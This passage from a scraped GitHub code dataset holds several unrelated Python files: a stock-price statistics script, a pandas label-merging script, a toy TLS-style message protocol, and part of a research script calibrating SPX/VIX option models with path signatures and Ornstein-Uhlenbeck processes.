s_high)]\r\n    max_delta = get_max_val(delta)\r\n    return 
max_delta\r\n\r\ndef largest_delta_two_days_close(s_close):\r\n    '''\r\n    :param s_close: float or int\r\n    :return: float or int\r\n    '''\r\n    delta_2d = [abs(s_close[i + 1] - s_close[i]) for i in range(len(s_close) - 1)]\r\n    max_delta_2days = get_max_val(delta_2d)\r\n    return max_delta_2days\r\n\r\ndef avg_daily_vol(s_vol):\r\n    '''\r\n    :param s_vol: float or int\r\n    :return: float or int\r\n    '''\r\n    total_vol = 0\r\n    for vol in s_vol:\r\n        total_vol = total_vol + vol\r\n    avg_vol = total_vol / len(s_vol)\r\n    return (avg_vol)\r\n\r\ndef get_median(array):\r\n    '''\r\n    :param array: float or int\r\n    :return:float or int\r\n    '''\r\n    array.sort()\r\n    med_index = len(array) // 2\r\n    median = (array[med_index] + array[~med_index]) / 2\r\n    return (median)\r\n\r\nmin_open = get_min_val(stock_open)\r\nmax_open = get_max_val(stock_open)\r\nmax_change = largest_change_one_day(stock_low,stock_high)\r\nmax_change_two_days = largest_delta_two_days_close(stock_close)\r\navg_daily_vol_2017 = avg_daily_vol(stock_vol)\r\nmedian_volume_2017 = get_median(stock_vol)\r\n\r\nprint('3a. The lowest Opening Price: ${:0.2f}'.format(min_open))\r\nprint('3b. The highest Opening Price: ${:0.2f}'.format(max_open))\r\nprint('4. The largest change in one day : ${:0.2f}'.format(max_change))\r\nprint('5. The largest change in any two days (based on close price): ${:0.2f}'.format(max_change_two_days))\r\nprint('6. Average daily trading volume during this year: {:0,.2f} units'.format(avg_daily_vol_2017))\r\nprint('7. Median trading volume during this year: {:0,.2f} units'.format(median_volume_2017))","repo_name":"willkuhns/miniProject1","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30644403378","text":"import pandas as pd\n\n# names of files to read from\n\nr_filenameTSV = 'OAV_60000_Training48000.tsv'\nr_filenameCSV = 'OAV8020Predict.csv'\n\n\ntsv_read = pd.read_csv(r_filenameTSV, sep='\\t',names=[\"vector\"])\ncsv_read = pd.read_csv(r_filenameCSV,names=[\"label_predict\"])\n\ndf = pd.DataFrame(tsv_read)\ndf2 = pd.DataFrame(csv_read)\n\ndf = pd.DataFrame(df.vector.str.split(' ',1).tolist(),\n                                   columns = ['label','vector'])\n\nprint (df)\nprint (df2)\n\nprint (df[['label']])\n\n#frames = ([df[['label']], df2])\n\nresult = pd.concat([pd.concat([df['label']], axis=0), pd.concat([df2], axis=0)], axis=1)\n\nprint (result)\n\nwith pd.ExcelWriter('output_label.xlsx') as writer: \n \t\t#df[['label']].to_excel(writer, sheet_name='Sheet_name_1')\n \t\tresult.to_excel(writer, sheet_name='Sheet_name_1')\n\n \n","repo_name":"matteoLorenzini/script","sub_path":"pandas/confusion.py","file_name":"confusion.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6005146558","text":"from MyTLS.MyTLSExceptions import WrongMessageException\nfrom MyTLS.Extras import *\nfrom MyTLS.MyTypes import *\nimport rsa\n\nclass AllMessages:\n    version = None\n    type = None\n    reserved = None\n    length = None\n    data = None\n\n    def __init__(self, msg: bytes):\n        if msg.__len__() < 4:\n            raise WrongMessageException(\"Error: message length too small\")\n\n        self.version = msg[0] & 0xf0\n        self.type = msg[0] & 0x0f\n        self.reserved = msg[1]\n        self.length = (msg[2] << 8) + msg[3]\n        self.data = msg[4:]\n\n    def _getNextHeader(self, msg: bytes) -> (int, bytes):\n        if msg.__len__() < 2:\n            raise WrongMessageException(\"Error: message header length too small\")\n\n        length = (msg[0] << 8) + 
msg[1]\n        if msg.__len__() < 2 + length:\n            raise WrongMessageException(\"Error: malformed message format\")\n\n        nextHeader = msg[2: length + 2]\n\n        return length, nextHeader\n\n    def _getHeader(self) -> list:\n        headerIndex = 0\n        msgLength = self.data.__len__()\n        header = []\n\n        while headerIndex < msgLength:\n            headerLength, nextHeader = self._getNextHeader(self.data[headerIndex:])\n            headerIndex += 2 + headerLength\n            header.append(nextHeader)\n\n        return header\n\n    @staticmethod\n    def makeBasicMessage(__type__: int,\n                         __length__: int,\n                         __version__ = messageType.VERSION_MYTLS1,\n                         __reserved__ = 0x0) -> bytes:\n        return bytes([__version__ + __type__, __reserved__]) + short2bytes(__length__)\n\nclass HelloMessage(AllMessages):\n    time = None\n    randomNum = None\n    encryMethod = None\n\n    def __init__(self, msg: bytes):\n        super().__init__(msg)\n\n        if self.type != messageType.TYPE_HELLO:\n            raise WrongMessageException(\"Error: wrong Hello message type\")\n\n        header = self._getHeader()\n        if header.__len__() != 3:\n            raise WrongMessageException(\"Error: malformed Hello message format\")\n\n        self.time = bytes2int(header[0][0: 4])\n        self.randomNum = bytes2int(header[1][0: 4])\n        self.encryMethod = bytes2int(header[2][0: 4])\n\n    @staticmethod\n    def makeMessage(__time__: int, __randomNum__: int, __encryMethod__: int) -> bytes:\n        msg = AllMessages.makeBasicMessage(__type__=messageType.TYPE_HELLO,\n                                           __length__=18)\n\n        length_4 = short2bytes(4)\n        msg += length_4 + int2bytes(__time__) + \\\n               length_4 + int2bytes(__randomNum__) + \\\n               length_4 + int2bytes(__encryMethod__)\n\n        return msg\n\nclass certExchangeMessage(AllMessages):\n    publicKey = None\n    owner = None\n    time = None\n\n    def __init__(self, msg: bytes):\n        super().__init__(msg)\n\n        if self.type != messageType.TYPE_CERTEXCHANGE:\n            raise WrongMessageException(\"Error: wrong Certificate Exchange message type\")\n\n        header = self._getHeader()\n        if header.__len__() != 3:\n            raise WrongMessageException(\"Error: malformed Certificate Exchange message format\")\n\n        t = header[0].decode(ENCODE_METHOD).split(\" \")\n        tn = int(t[0])\n        te = int(t[1])\n\n        self.publicKey = rsa.PublicKey(tn, te)\n        self.owner = header[1].decode(ENCODE_METHOD)\n        self.time = bytes2int(header[2][0: 4])\n\n    @staticmethod\n    def makeMessage(__publicKey__: rsa.PublicKey, __owner__: str, __time__: int) -> bytes:\n        ttMsg = (str(__publicKey__.n) + \" \" + str(__publicKey__.e)).encode(ENCODE_METHOD)\n        length_ = short2bytes(ttMsg.__len__())\n        tMsg = length_ + ttMsg\n\n        ttMsg = __owner__.encode(ENCODE_METHOD)\n        length_ = short2bytes(ttMsg.__len__())\n        tMsg += length_ + ttMsg\n\n        ttMsg = int2bytes(__time__)\n        length_ = short2bytes(4)\n        tMsg += length_ + ttMsg\n\n        msg = AllMessages.makeBasicMessage(__type__=messageType.TYPE_CERTEXCHANGE,\n                                           __length__=tMsg.__len__())\n\n        return msg + tMsg\n\nclass keyExchangeMessage(AllMessages):\n    key = None\n\n    def __init__(self, msg: bytes):\n        super().__init__(msg)\n\n        if self.type != messageType.TYPE_KEYEXCHANGE:\n            raise WrongMessageException(\"Error: wrong Key Exchange message type\")\n\n        header = self._getHeader()\n        if header.__len__() != 1:\n            raise WrongMessageException(\"Error: malformed Key Exchange message format\")\n\n        self.key = header[0]\n\n    @staticmethod\n    def makeMessage(__key__: bytes) -> bytes:\n        msg = AllMessages.makeBasicMessage(__type__=messageType.TYPE_KEYEXCHANGE,\n                                           __length__=2 + __key__.__len__())\n\n        msg += short2bytes(__key__.__len__()) + __key__\n        return msg\n\nclass HelloDoneMessage(AllMessages):\n    def __init__(self, msg: bytes):\n        super().__init__(msg)\n        if self.type != messageType.TYPE_HELLODONE:\n            raise WrongMessageException(\"Error: wrong Hello Done message type\")\n\n    @staticmethod\n    def 
makeMessage() -> bytes:\n        msg = AllMessages.makeBasicMessage(__type__=messageType.TYPE_HELLODONE,\n                                           __length__=0)\n        return msg\n\nclass ChangeCipherSpecMessage(AllMessages):\n    def __init__(self, msg: bytes):\n        super().__init__(msg)\n\n        if self.type != messageType.TYPE_CHANGECIPHERSPEC:\n            raise WrongMessageException(\"Error: wrong Change Cipher Spec message type\")\n\n    @staticmethod\n    def makeMessage() -> bytes:\n        msg = AllMessages.makeBasicMessage(__type__=messageType.TYPE_CHANGECIPHERSPEC,\n                                           __length__=0)\n        return msg\n\nclass FinishedMessage(AllMessages):\n    finishedMsg = None\n\n    def __init__(self, msg: bytes):\n        super().__init__(msg)\n        if self.type != messageType.TYPE_FINISHED:\n            raise WrongMessageException(\"Error: wrong Finished message type\")\n\n        header = self._getHeader()\n        if header.__len__() != 1:\n            raise WrongMessageException(\"Error: malformed Finished message format\")\n\n        self.finishedMsg = header[0]\n\n    @staticmethod\n    def makeMessage(__finishedMsg__: bytes) -> bytes:\n        msg = AllMessages.makeBasicMessage(__type__=messageType.TYPE_FINISHED,\n                                           __length__=2 + __finishedMsg__.__len__())\n        return msg + short2bytes(__finishedMsg__.__len__()) + __finishedMsg__\n\nclass Payload(AllMessages):\n    payload = None\n\n    def __init__(self, msg: bytes):\n        super().__init__(msg)\n        if self.type != messageType.TYPE_PAYLOAD:\n            raise WrongMessageException(\"Error: wrong payload message type\")\n\n        self.payload = self.data\n\n    @staticmethod\n    def makeMessage(__payload__: bytes, __end__ = 0) -> bytes:\n        msg = AllMessages.makeBasicMessage(__type__=messageType.TYPE_PAYLOAD,\n                                           __length__=__payload__.__len__(),\n                                           __reserved__=__end__)\n        return msg + __payload__\n","repo_name":"typename-yyf/TLSProject","sub_path":"MyTLS/MessageTypes.py","file_name":"MessageTypes.py","file_ext":"py","file_size_in_byte":7141,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17991391193","text":"\"\"\"\nCreated on Sat Jan 28 18:08:38 2023\n\n@author: Guido Gazzani & Janka Moeller\n\"\"\"\n\n\nimport numpy as np\nimport pandas as pd\nimport itertools as itt \nfrom tqdm.auto import tqdm\nimport os\nimport torch\nfrom numpy.linalg import cholesky\nfrom joblib import Parallel,delayed\nfrom scipy.stats import random_correlation\nimport signatory \n\nprint('Signatory version:',signatory.__version__)\nprint('Torch version',torch.__version__)\nprint('Numpy version',np.__version__)\n\n#Choose maturities and day (notice not the same maturities across different days!)\n\nflag_gatheral=False\nflag_missing_last=False\nflag_save_control_variates=False\navailable_Gplus=False\nnumerical_approx=False\nflag_chol_vix=True\n\n\n########## the configuration is just an indicator of some pre-initialized parameters of the primary object\n########## it acts as our Reservoir\n\nconfig='config8'\n\n\nif flag_gatheral==True: \n##################### for GATHERAL TEST (see the maturities used in the Quadratic Rough Heston)\n    list_of_maturities_vix=np.array([12.0, 19.0, 26.0, 33.0])/365.25\n    list_of_maturities_spx=np.array([12.0, 19.0, 26.0, 33.0])/365.25\n\nelse:\n    list_of_maturities_vix=np.array([14.0, 28.0, 49.0, 77.0, 105.0, 140.0, 259.0])/365.25\n    list_of_maturities_spx=np.array([14.0, 44.0, 58.0, 79.0, 107.0, 135.0, 170.0, 181.0, 198.0, 212.0, 233.0, 289.0, 380.0])/365.25\n\n    \n\n#For 20210602\n############################################\n# PLEASE SELECT MORE SPX MATURITIES THAN VIX MATURITIES!\n\n\n\ndef cubes_zeros(n,m):\n    '''\n    Inputs:\n        n: int\n        m: int\n        \n    Return: list of m+1 cubes of increasing order from 0 to n^m\n    '''\n    cubes=[0,]\n    for K in 
range(0,m):\n cubes.append(np.tensordot(cubes[-1],np.zeros((n,)), axes=0))\n return cubes\n\ndef fromcubestoarray (cubes):\n '''\n Inputs:\n cubes: list of cubes of increasing order\n \n Return:\n array: list \n stretched cubes\n '''\n array = [cubes[0],]\n values=[i for i in range(len(cubes[1]))]\n for k in range(1,len(cubes)):\n for word in itt.product(values, repeat=k):\n array= array+[cubes[k][word],]\n array = np.array(array)\n return array\n\ndef shuffle(a,b):#### a faster implementation is available if needed\n '''\n Inputs:\n a : list\n a word to be shuffled\n b : list\n b word to be shuffled\n \n Return:\n sh : list\n shuffle between a and b\n '''\n sh = []\n if len(a)==0:\n return [b,]\n if len(b)==0:\n return [a,]\n else:\n [sh.append([a[0],]+p) for p in shuffle(a[1:],b)]\n [sh.append([b[0],]+p) for p in shuffle(a,b[1:])]\n return sh\n\n\ndef sum_of_powers(x,y):\n '''\n Inputs:\n x,y : int, int \n Returns: sum over i=0 to y of x^y\n '''\n if y<=0:\n return 1\n else:\n return x**y + sum_of_powers(x,y-1)\n \ndef number_of_parameters_gen(order_signature,comp_of_path):\n '''\n Inputs:\n order_signature : int\n comp_of_path : int\n \n Return:\n sp : d_n if d=comp_of_path, n=order_signature\n '''\n sp=sum_of_powers(comp_of_path,order_signature)\n \n return sp\n\n\n\ndef OUL(d,m,Y_0,thetas,kappas,sigmas,Rho): #Computes the matrix G^T associated to the drift operator\n ''' # See also implementation in Cuchiero, Svaluto-Ferro, Teichmann (2023), they are equivalent\n Inputs:\n d : int\n m : int \n Y_0: list of initial values of the OU processes\n thetas: list of long-run means of the OUs\n kappas: list of reverting speeds of the OUs\n sigmas: list of volatilities of the OUs\n Rho: dxd np.array, correlation matrix of the OUs\n \n Returns:\n matrix: (d_m)x(d_m) np.array, G^T matrix associated to the operator\n '''\n \n dim=d+1\n matrix=np.zeros(int((dim**(m+1)-1)/(dim-1)))\n b_first=[kappas[i]*(thetas[i]-Y_0[i]) for i in range(d)]\n b_second=[-kappas[i] for i in range(d)]\n A_matrix=np.zeros((dim,dim))\n for i in range(1,dim):\n for j in range(1,dim):\n A_matrix[i,j]=(1/2)*Rho[i-1,j-1]*sigmas[i-1]*sigmas[j-1]\n \n for k in tqdm(range(1,m+1)):\n for word in itt.product([letters for letters in range(dim)],repeat=k): \n cubes=cubes_zeros(d+1,m)\n if word[-1]==0:\n if k==1:\n cubes[0]=1\n else:\n cubes[k-1][tuple(word[:-1])] = 1\n else:#if the word ends with something different than zero/ i.e., diff. 
than time-component\n                if k==1:\n                    cubes[0]=cubes[0]+b_first[word[-1]-1]\n                    cubes[k][word]=cubes[k][word]+b_second[word[-1]-1] # correct up to here\n                if k>1:\n                    cubes[k-1][tuple(word[:-1])]=cubes[k-1][tuple(word[:-1])]+b_first[word[-1]-1]\n                    \n                    if k==2:\n                        cubes[0]=cubes[0]+A_matrix[word[-1],word[-2]] \n                    else:\n                        cubes[k-2][tuple(word[:-2])]=cubes[k-2][tuple(word[:-2])]+A_matrix[word[-1],word[-2]]\n\n                    for sh in shuffle(list(word)[:-1],[word[-1]]):\n                        cubes[k][tuple(sh)]=cubes[k][tuple(sh)]+b_second[word[-1]-1]\n                    \n            newline = fromcubestoarray(cubes)\n            matrix = np.vstack((matrix,newline))\n    return matrix\n\n\n\ndef get_words(d,order_signature):\n    '''\n    Inputs: \n        d: int\n        order_signature: int\n    \n    Returns:\n        words: list of TUPLES (words) up to letter d and length order_signature\n    '''\n    words=[()]\n    for k in range(1,order_signature+1):\n        for word in itt.product([letters for letters in range(d+1)],repeat=k):\n            words.append(word)\n        \n    return words\n\ndef get_words_list(d,order_signature):\n    '''\n    Inputs: \n        d: int\n        order_signature: int\n    \n    Returns:\n        words: list of LISTS (words) up to letter d and length order_signature\n    '''\n    words=[[]]\n    for k in range(1,order_signature+1):\n        for word in itt.product([letters for letters in range(d+1)],repeat=k):\n            words.append(list(word))\n        \n    return words\n\n\ndef multidimensional_OU(X0,N,T,Rho,kappas,thetas,sigmas,flag_aug,flag_mat):\n    '''\n    Inputs: \n        X0: list of initial values of the OU processes\n        N: int, number of grid points\n        T: float/int final time\n        Rho: dxd np.array, correlation matrix of the OUs\n        kappas: list of reverting speeds of the OUs\n        thetas: list of long-run means of the OUs\n        sigmas: list of volatilities of the OUs\n        flag_aug: if False, return (X_t) and not (t,X_t)\n        flag_mat: if True, N is set to daily sampling (calendar days)\n    \n    Returns: \n        X: np.array (t,X_t)_{t\\in[0,T]} \n        W: np.array (W_t) driving Bms\n    \n    '''\n    \n    ######################################################################################## Comment: if you \n    ####################### uncomment some chunks you will retrieve the underlying correlated brownian motions\n    ####################### and you can switch to Euler-Maruyama instead of simulating directly from the solution of the SDE\n    if flag_mat==True: #flag_mat is to sample up to a maturity time T>0 with daily sampling\n        N=int(np.rint(T*365.25)) #flag_aug is to return (t,X_t) \n\n    dim=len(X0)\n    A=np.zeros((dim,dim))\n    A=np.matrix(A)\n    for i in range(dim):\n        for j in range(dim):\n            A[i,j]=Rho[i,j]*sigmas[i]*sigmas[j] \n    C=cholesky(A)\n    #C_1=cholesky(Rho)\n    X = np.zeros([dim, int(N+1)])\n    X[:,0]=X0\n    #X_tilde[:,0]=X0\n    T_vec, dt = np.linspace(0, T, N+1, retstep=True ) \n    print(dt)\n    BMs=np.zeros([dim, int(N+1)])\n    expy=np.array([np.exp(-kappas[j]*dt) for j in range(len(kappas))])\n    Z = np.random.normal(0., 1., (dim,N+1))\n    diffusion = np.matmul(C, Z)*np.sqrt(dt)\n    thetas=np.array(thetas) ######################################################### up to here can be done outside the function to speed up\n    for i in range(1,int(N+1)):\n        #Z_i=Z[:,i]\n        diffusion_i = diffusion[:,i].squeeze(1) #these are diffusions including the BM\n        #BMs[:,i]=np.matmul(C_1, Z_i)*np.sqrt(dt) #these are all BMs\n        #X[:,i]=X[:,i-1]+kappas*(thetas-X[:,i-1])*dt+diffusion \n        X[:,i]=thetas+np.multiply((X[:,i-1]-thetas),expy)+diffusion_i \n    if flag_aug==False:\n        return X,T_vec,np.cumsum(BMs,axis=1)\n    else:\n        return np.concatenate((np.expand_dims(T_vec,0),X),axis=0), np.cumsum(BMs,axis=1)\n\ndef 
sample_sig_OU_multi_minimal(N,T,X0,sigmas,kappas,thetas,Rho,order_signature,flag_mat):\n '''Inputs: same as the previous function'''\n \n augmented_OU, Bms =multidimensional_OU(X0,N,T,Rho,kappas,thetas,sigmas,True,flag_mat)\n augmented_OU_torch=torch.from_numpy(augmented_OU.transpose()).unsqueeze(0)\n sig=signatory.signature(augmented_OU_torch,order_signature,stream=True,basepoint=False,scalar_term=True)\n sig_arr=sig.squeeze().numpy()\n return sig_arr\n\n\n\ndef sample_sig_OU_multi_minimal_all_mat(N,maturities,X0,sigmas,kappas,thetas,Rho,order_signature,flag_mat):\n '''Inputs: in addition to the previous function\n here it samples a full set of maturities\n maturities: np.array\n '''\n \n last_mat= maturities[-1]\n full_sig= sample_sig_OU_multi_minimal(N,last_mat+1/365.25,X0,sigmas,kappas,thetas,Rho,order_signature,flag_mat) \n mat_in_days= [int(np.rint(m*365.25)) for m in maturities]\n get_model= [full_sig[m-1,:] for m in mat_in_days]\n get_model=np.array(get_model)\n return get_model\n\nmaturity=0.5\nflag_mat=True\nN=int(maturity*365.25) # put here the daily sampling\nT=maturity # put here maturities\n## first three a bit redundant \n\n\n\n \nif int(config[-1])==8: \n d=4\n order_signature=3\n sigmas=[0.7,10,5,1]\n kappas=[0.1,25,10,0]\n X0=[1,0.08,2,0]\n thetas=[0.1,4,0.08,0]\n os.chdir(r'/scratch.global/ag_cu/Codes_Guido/Randomness/n=2/config2')\n Rho =np.load('Rho_d=4.npy')\n\nif int(config[-1])==0: ############ Only correlated Brownian motions\n d=3\n order_signature=3\n sigmas=[1,1,1]\n kappas=[0,0,0]\n X0=[0,0,0]\n thetas=[0,0,0]\n \n rng = np.random.default_rng(1267)\n Rho = random_correlation.rvs((2, 0.7, 0.3), random_state=rng)\n \n\n\ndim=d+1\n\nprint('sigmas:\\n',sigmas)\nprint('kappas:\\n',kappas)\nprint('thetas:\\n',thetas)\nprint('\\n')\nprint('Dimension expected/number of parameters to calibrate:',number_of_parameters_gen(order_signature,d))\nd_star=number_of_parameters_gen(order_signature,dim)\nnbr_param=number_of_parameters_gen(order_signature*2,d+1)\nRho=Rho[:len(X0),:len(X0)]\nprint('Correlation matrix:\\n',np.matrix(Rho).round(4))\n\n\nkeys_df=[str(word).replace(',','') if len(word)==1 else str(word).replace(' ','') for word in get_words(d,order_signature*2+1)]\nwords_as_lists=get_words_list(d,order_signature)\nwords_as_strings=[str(word).replace(\" \", \"\") for word in get_words(d,order_signature)]\n\n\ndef e_tilde_multivariate(word,d):\n '''\n Inputs:\n word: list of ints\n d: int, \"highest\" letter considered\n \n \n Returns:\n new_words: list of lists, if word[-1]==0 add process component \n new_words2: list of lists, only if word[-1]=!0, Ito-Stratonovich corrections\n \n '''\n \n the_components=np.array(range(d))+1\n new_words=[]\n for k in range(d):\n new_words.append(word.copy())\n new_words[k].append(the_components[k])\n if word[-1]==0:\n return new_words\n if word[-1]!=0: \n new_words2=[]\n for j in range(d):\n new_words2.append(word.copy())\n new_words2[j][-1]=0\n return new_words, new_words2\n\n\ndef e_tilde_multivariate_part2(words_as_lists,d):\n '''\n Inputs:\n words_as_lists: list of lists of ints\n d: int components\n \n Returns: list of lists, tilde auxiliary output\n '''\n tilde=[list(e_tilde_multivariate(words_as_lists[k],d)) for k in np.array(range(len(words_as_lists)))[1:]]\n return tilde\n\ntilde=e_tilde_multivariate_part2(words_as_lists,d)\ntilde_copy=tilde.copy()\n#print(tilde)\n\ndef list_to_string(my_list):\n '''\n Inputs: \n my_list: list\n \n Returns: a string version of the list\n '''\n \n if len(my_list)==1:\n return 
str(tuple(my_list)).replace(\",\",\"\")\n else:\n return str(tuple(my_list)).replace(\" \",\"\")\n\ndef from_tilde_to_string(tilde,d):\n ''' \n Inputs: \n - The output of function e_tilde_multivariate_part2 (copied)\n d: int, components\n Returns: list of strings, the tilde transformation labels\n '''\n dimension_one_plus=d+1\n for k in range(len(tilde)):\n if k%dimension_one_plus==0:\n tilde[k]=[str(tuple(tilde[k][j])).replace(\" \",\"\") for j in range(len(tilde[k]))]\n else:\n tilde[k][0]=[list_to_string(element) for element in tilde[k][0]]\n tilde[k][1]=[list_to_string(element) for element in tilde[k][1]]\n \n return tilde\n\n\n# IMPORTANT FOR TILDE TRANSFORMATION\nnew_tilde=from_tilde_to_string(tilde,d)\n\n\ndef get_cov_mat(sigmas,Rho,d):\n '''\n Inputs:\n sigmas: list of sigmas\n Rho_ex: dxd np.array, Rho correlation matrix\n d: int \n ''' \n Rho_ex=np.zeros([d+1,d+1])\n Rho_ex[1:,1:]=Rho\n Cov=np.zeros([d+1,d+1])\n for j in range(1,d+1):\n for k in range(1,d+1):\n Cov[j,k]=Rho_ex[j,k]*(sigmas[j-1]*sigmas[k-1])\n return Cov\n\n\n\nCov=get_cov_mat(sigmas,Rho,d)\n#print('Covariance matrix augmented for the time:\\n',Cov)\n\n\ndef transform_df_multivariate(sig_df,new_tilde,order_signature,d,Cov): \n '''\n Inputs:\n sig_df: pandas_df or pandas_series, output of function sample_sig_OU_multi()\n new_tilde: output of the tilde transformation\n order_signature: int, order of the signature\n d: int, components\n Cov: d+1xd+1 np.array, Covariance matrix (with additional row and columns for the time)\n \n Returns: \n df_concat_new: pandas_df, signature after tilde transformation\n ''' \n words_as_lists=get_words_list(len(X0),order_signature)\n strings=[str(word).replace(',','') if len(word)==1 else str(word).replace(' ','') for word in get_words(len(X0),order_signature)]\n auxiliary_empty_lists = [[] for i in range(d)]\n \n for k in range(len(strings)):\n if k==0:\n for j in range(1,d+1):\n auxiliary_empty_lists[j-1].insert(0,sig_df[strings[j+1]])\n if ((k>0) and (words_as_lists[k][-1]==0)):\n for j in range(1,d+1):\n auxiliary_empty_lists[j-1].append(sig_df[new_tilde[k-1][j-1]])\n if ((k>0) and (words_as_lists[k][-1]!=0)):\n r=words_as_lists[k][-1]\n for j in range(1,d+1):\n auxiliary_empty_lists[j-1].append(sig_df[new_tilde[k-1][0][j-1]]-Cov[j,r]*0.5*sig_df[new_tilde[k-1][1][j-1]])\n helper_=[]\n for j in range(d):\n new_keys=[strings[k]+str('~Z_{}'.format(j+1)) for k in range(len(strings))]\n new_dict={key:series for key,series in zip(new_keys,auxiliary_empty_lists[j])}\n transformed_data_frame_W=pd.DataFrame(new_dict)\n helper_.append(transformed_data_frame_W)\n df_concat_new=pd.concat(helper_,axis=1)\n return df_concat_new\n\n\ndef get_tilde_keys(d,order_signature):\n strings=[str(word).replace(',','') if len(word)==1 else str(word).replace(' ','') for word in get_words(d,order_signature)]\n list_tilde_keys=[]\n for j in range(d):\n new_keys=np.array([strings[k]+str('~Z_{}'.format(j+1)) for k in range(len(strings))])\n list_tilde_keys.append(new_keys)\n return list(np.array(list_tilde_keys).flatten())\n\n\nlist_joint_maturities=np.sort(np.array(list(set(list(list_of_maturities_vix)+list(list_of_maturities_spx)))))\n#indices=['Maturity T={}'.format(j) for j in range(1,max(len(list_of_maturities_spx),len(list_of_maturities_vix))+1)]\nindices=['Maturity T={}'.format(j) for j in range(1,len(list_joint_maturities)+1)]\ntilde_keys=get_tilde_keys(d,order_signature)\nidx_Z_d=[important_key for important_key in tilde_keys if important_key[-3:]=='Z_'+str(d)]\nkeys_df_vix=[str(word).replace(',','') 
if len(word)==1 else str(word).replace(' ','') for word in get_words(d-1,order_signature*2)]\n\n\ndef remove_redundant_components(transformed_df,idx_Z_d,d,flag_not_dropped):\n    '''\n    Inputs:\n        transformed_df: pandas DataFrame, tilde signature at maturity\n        idx_Z_d: list of strings (labels of the last integral wrt Z_d)\n        d: int, components\n        flag_not_dropped: boolean, if True returns the index of the labels to be kept\n    Returns:\n        df: pandas DataFrame, tilde signature without the redundant components\n    \n    '''\n    \n    df=transformed_df[idx_Z_d]\n    if flag_not_dropped==True:\n        \n        not_dropped=[] \n        for i,c in enumerate(df.columns):\n            if str(d) in c[:-4]:\n                df=df.drop(columns=[c])\n            else:\n                not_dropped.append(i)\n        return df, not_dropped\n    else:\n        for i,c in enumerate(df.columns):\n            if str(d) in c[:-4]:\n                df=df.drop(columns=[c])\n        return df \n\n\ndef append_time(a):\n    '''\n    -Auxiliary function to append time to a list \"a\"\n    '''\n    aux=a.copy()\n    aux.append(0)\n    return [aux]\n\ndef shuffle_and_add_time(a,b):\n    '''\n    Inputs: #Only difference with the shuffle function is that we always append [0] (time-component) at the end\n        a : array\n            a word to be shuffled\n        b : array\n            b word to be shuffled\n    \n    Returns:\n        sh : list\n            shuffle between a and b\n    '''\n    sh = []\n    if len(a)==0:\n        return append_time(b)\n    if len(b)==0:\n        return append_time(a)\n    else:\n        [sh.append([a[0],]+p+[0]) for p in shuffle(a[1:],b)]\n        [sh.append([b[0],]+p+[0]) for p in shuffle(a,b[1:])]\n    return sh\n\n\ndef p_shuffle(order_signature,d):\n    '''\n    Inputs: \n        order_signature, d: int, int\n    \n    Returns:\n        p, torch.tensor dimension d+1_n x d+1_n x d+1_2n \n    \n    '''\n    \n    nbr_param_x2plus=number_of_parameters_gen(order_signature*2+1,d+1)\n    dict_words_numbers=dict(zip(get_words(d,order_signature*2+1),[k for k in range(nbr_param_x2plus)]))\n    p=[]\n    wordz=get_words_list(d,order_signature)\n    for word1 in tqdm(wordz):\n        for word2 in wordz:\n            sh=shuffle_and_add_time(word1,word2)\n            p_components=np.zeros(nbr_param_x2plus)\n            for shuffled in sh:\n                p_components[dict_words_numbers[tuple(shuffled)]]=p_components[dict_words_numbers[tuple(shuffled)]]+1\n            p.append(p_components)\n    p=np.array(p)\n    p=p.reshape((int(np.sqrt(p.shape[0])),int(np.sqrt(p.shape[0])),nbr_param_x2plus))\n    return torch.tensor(p)\n\ndef p_shuffle_addtime(order_signature,d):\n    '''\n    Inputs: \n        order_signature, d: int, int\n    \n    Returns:\n        p, torch.tensor dimension d_n x d_n x d_2n \n    \n    '''\n    \n    nbr_param=number_of_parameters_gen(order_signature*2,d+1)\n    dict_words_numbers=dict(zip(get_words(d,order_signature*2),[k for k in range(nbr_param)]))\n    p=[]\n    wordz=get_words_list(d,order_signature)\n    for word1 in tqdm(wordz):\n        for word2 in wordz:\n            sh=shuffle(word1,word2)\n            p_components=np.zeros(nbr_param)\n            for shuffled in sh:\n                p_components[dict_words_numbers[tuple(shuffled)]]=p_components[dict_words_numbers[tuple(shuffled)]]+1\n            p.append(p_components)\n    p=np.array(p)\n    p=p.reshape((int(np.sqrt(p.shape[0])),int(np.sqrt(p.shape[0])),nbr_param))\n    return torch.tensor(p)\n\n\n\n\n\ndef apply_along_axis(function, x, axis):\n    torch_unbind=torch.unbind(x, dim=axis)\n    aux=Parallel(n_jobs=-1)(delayed(function)(x_i) for x_i in tqdm(torch_unbind))\n    return aux #torch.stack(aux,dim=axis)\n\ndef integration_torch(function,x,axis):\n    return torch.trapz(torch.stack(apply_along_axis(function, x, axis),dim=axis),x)\n\nif numerical_approx==True:\n    \n    G=OUL(d-1,2*order_signature,X0[:d-1],thetas[:d-1],kappas[:d-1],sigmas[:d-1],Rho[:d-1,:d-1]) #removing the BM component\n    
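# sketch of the role of G (assumption, inferred from the OUL docstring): G is\n    # the matrix of the OU drift operator acting on truncated-signature\n    # coefficients, so the Taylor and trapezoidal branches below approximate\n    # the same quantity, the integral of matrix_exp(s*G) for s in [0, Delta].\n    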
G_torch=torch.tensor(G)\nnbr_param=number_of_parameters_gen(order_signature*2,d-1+1)\n#print('Check if the dimension of G is correct:',G.shape == (nbr_param,nbr_param))\ndict_words_numbers=dict(zip(get_words(d-1,order_signature*2),[k for k in range(nbr_param)]))\nDelta=1/12\n\nif numerical_approx==True:\n if np.max(np.abs(np.linalg.eig((G_torch*Delta).numpy())[0]))<1:\n print('Spectral radius:', np.max(np.abs(np.linalg.eig((G_torch*Delta).numpy())[0])))\n print('Spectral radius < 1, we can use Taylor expansion')\n len_expansion=100 #Computes the integral by expanding to len_expansion the definition of e^Gt\n taylor_exp=torch.eye(G_torch.shape[0])*Delta\n factorials=[np.math.factorial(k+1) for k in range(1,len_expansion)]\n for k in tqdm(range(1,len_expansion),desc='Taylor expansion'):\n k_th_term_taylor=Delta*torch.linalg.matrix_power(G_torch*Delta,k)*(factorials[k-1]**(-1))\n taylor_exp=taylor_exp+k_th_term_taylor\n else:\n nbins=50 #this can be pushed if nbr_parameters is not too high\n print('Spectral radius > 1, we can use Trapezoidal rule with 